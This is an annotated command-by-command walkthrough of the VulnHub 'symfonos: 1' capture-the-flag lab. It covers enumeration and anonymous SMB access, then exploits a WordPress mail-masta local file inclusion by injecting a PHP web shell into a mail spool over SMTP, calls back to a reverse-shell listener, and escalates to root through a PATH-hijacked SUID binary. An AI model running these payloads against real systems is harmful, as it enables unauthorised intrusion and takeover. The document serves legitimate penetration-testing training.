VulnHub: symfonos: 1

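# --- Host discovery and service enumeration ---------------------------------
# Ping-sweep the lab /24; 192.168.60.131 is the host that answered.
nmap -sn 192.168.60.128/24

# -Pn skips host discovery. The second pass covers 1000-65535; use -p- if a
# single full-range scan is preferred.
nmap -Pn 192.168.60.131
nmap -Pn -p1000- 192.168.60.131

# Service/version and OS detection on the ports found open above.
nmap -A -p22,25,80,139,445 192.168.60.131

# --script takes a script name or category as its argument. The original
# "nmap --script -p22,25,..." handed the port list to --script, so no ports
# were selected and no useful scripts ran; name the category explicitly.
nmap --script vuln -p22,25,80,139,445 192.168.60.131

# Banner grabs. All three use the target address 192.168.60.131 -- the
# walkthrough transposed the last two octets (192.168.131.60) on the telnet
# and nikto lines, which aims them at a host outside this lab.
ssh 192.168.60.131
telnet 192.168.60.131 25
nikto -h http://192.168.60.131

# Directory brute force, three wordlists of increasing size.
# -x appends the listed extensions to each word; -q suppresses the banner.
gobuster dir --wordlist /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt \
  -u http://192.168.60.131/ -x php,txt,html,sh,cgi,bak -q
gobuster dir --wordlist /usr/share/dirb/wordlists/big.txt \
  -u http://192.168.60.131/ -x php,txt,html,sh,cgi,bak -q
gobuster dir --wordlist /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-big.txt \
  -u http://192.168.60.131/ -x php,txt,html,sh,cgi,bak -q

# SMB: enumerate shares and users over a null session.
nmap -p 445 --script=smb-enum-shares.nse,smb-enum-users.nse 192.168.60.131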
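# --- SMB: pull the readable files -------------------------------------------
# The "anonymous" share accepts a null session: -N suppresses the password
# prompt, and -c runs the listed smbclient commands non-interactively instead
# of the typed dir / get / exit sequence.
smbclient -N //192.168.60.131/anonymous -c 'dir; get attention.txt'
cat attention.txt

# The "helios" share needs helios' credentials. The walkthrough tried
# "epidoko" (rejected) and then "qwerty" (accepted) at the password prompt.
# Keep entering it at the prompt rather than passing it on the command line,
# where it would be recorded in shell history and visible in `ps`.
smbclient //192.168.60.131/helios -U helios -c 'dir; get research.txt; get todo.txt'
cat research.txt todo.txt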
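# --- Virtual host + WordPress enumeration -----------------------------------
# The site lives under http://symfonos.local/h3l105/ (presumably learned from
# the files pulled off SMB -- the walkthrough switches hostname right after
# reading them). It is a name-based vhost, so map the name to the target IP
# locally. Appending the line is reproducible; the original "nano /etc/hosts"
# left the actual entry undocumented.
grep -q 'symfonos.local' /etc/hosts ||
  echo '192.168.60.131 symfonos.local' | sudo tee -a /etc/hosts >/dev/null

nikto -h http://symfonos.local/h3l105/

gobuster dir --wordlist /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt \
  -u http://symfonos.local/h3l105/ -x php,txt,html,sh,cgi,bak -q
gobuster dir --wordlist /usr/share/dirb/wordlists/big.txt \
  -u http://symfonos.local/h3l105/ -x php,txt,html,sh,cgi,bak -q
gobuster dir --wordlist /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-big.txt \
  -u http://symfonos.local/h3l105/ -x php,txt,html,sh,cgi,bak -q

# Enumerate themes (-et), plugins (-ep) and users (-eu).
wpscan --url http://symfonos.local/h3l105/ -et -ep -eu

# Passive plugin detection only sees plugins that leave traces in the pages
# wpscan fetches; aggressive mode requests known plugin paths directly and
# is what surfaces mail-masta on this box.
wpscan --url http://symfonos.local/h3l105/ --plugins-detection aggressive

# Password attack against the enumerated users: first the candidates
# collected from the SMB share, then rockyou. On Kali the directory is
# /usr/share/wordlists/ (plural) -- the original path did not exist -- and
# rockyou ships gzipped, so unpack it once first.
wpscan --url http://symfonos.local/h3l105/ -et -ep -eu -P pass_from_smb.txt
[ -f /usr/share/wordlists/rockyou.txt ] || sudo gunzip -k /usr/share/wordlists/rockyou.txt.gz
wpscan --url http://symfonos.local/h3l105/ -et -ep -eu -P /usr/share/wordlists/rockyou.txt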
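# --- Local file inclusion in the mail-masta plugin --------------------------
# count_of_send.php includes whatever path arrives in the "pl" parameter with
# no validation (the widely reported mail-masta LFI, usually cited as
# CVE-2016-10956 -- check the installed plugin version against the advisory).
# /etc/passwd confirms the include works; the next two targets are files an
# unauthenticated remote user can append to through the open SMTP port, which
# is what turns a read primitive into code execution.
lfi='http://symfonos.local/h3l105/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php'
curl -s --get "$lfi" --data-urlencode 'pl=/etc/passwd'
curl -s --get "$lfi" --data-urlencode 'pl=/var/log/mail.log'
curl -s --get "$lfi" --data-urlencode 'pl=/var/mail/helios'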
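# --- Poison helios' mail spool with PHP, then include it ----------------------
# Mail accepted on port 25 for the local user "helios" is delivered to
# /var/mail/helios, the file the LFI can read. The envelope sender is written
# into that file verbatim, so a PHP tag in MAIL FROM becomes live code as
# soon as the spool is include()d. The walkthrough typed this exchange into
# "telnet 192.168.60.131 25"; the scripted form below sends the same lines
# with proper CRLF line endings and a pause so each server reply arrives
# before the next command. The DATA body is intentionally empty -- the
# payload lives in the envelope, so "." ends the message immediately.
while IFS= read -r line; do
  printf '%s\r\n' "$line"
  sleep 1
done <<'EOF' | nc 192.168.60.131 25
EHLO jckhmr
MAIL FROM: "jckhmr <?php echo shell_exec($_GET['cmd']);?>"
RCPT TO: helios
DATA
.
quit
EOF

# Trigger: include the spool and pass the command in "cmd". --data-urlencode
# handles spaces, "&" and "/" in the command; the raw "&cmd=id" URL only
# works for commands without such characters.
lfi='http://symfonos.local/h3l105/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php'
curl -s --get "$lfi" --data-urlencode 'pl=/var/mail/helios' --data-urlencode 'cmd=id'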
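# --- Reverse shell and privilege escalation ----------------------------------
# Listener on the attack box. The walkthrough does not show the reverse-shell
# command it sent through "cmd="; it goes through the same curl/URL used for
# "cmd=id" and must connect back to this port.
rlwrap nc -lvp 443

# ---- everything below runs on the target, inside the shell that called back

# Upgrade to a PTY so interactive programs behave. Use python3 if the target
# has no "python" binary.
python -c 'import pty;pty.spawn("/bin/bash");'

# What is in /opt, and what does statuscheck do when run?
cd /opt
ls -la
./statuscheck

# SUID binaries system-wide; statuscheck should appear here -- the hijack
# below relies on it running with the owner's (root) effective uid.
find / -perm -u=s -type f 2>/dev/null

# Look for the command statuscheck shells out to. The hijack assumes it
# invokes "curl" by bare name, i.e. resolved through PATH at run time.
strings /opt/statuscheck

# PATH hijack: a fake "curl" that execs a shell, found first because /tmp is
# prepended to PATH. Two changes from the original:
#  * PATH is set for this one invocation only, not exported for the whole
#    session, so every later command still resolves real binaries;
#  * +x is all the file needs -- chmod 777 lets any other user on the box
#    swap in their own payload before the SUID binary runs it.
cd /tmp
printf '#!/bin/sh\n/bin/sh\n' > curl
chmod +x curl
PATH=/tmp:$PATH /opt/statuscheck
whoami

# NOTE(review): "whoami" printing root depends on statuscheck not dropping
# privileges before spawning and on /bin/sh keeping the effective uid; if it
# still prints helios, try "/bin/bash -p" in the fake curl instead.
cd /root
ls -la
cat proof.txt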
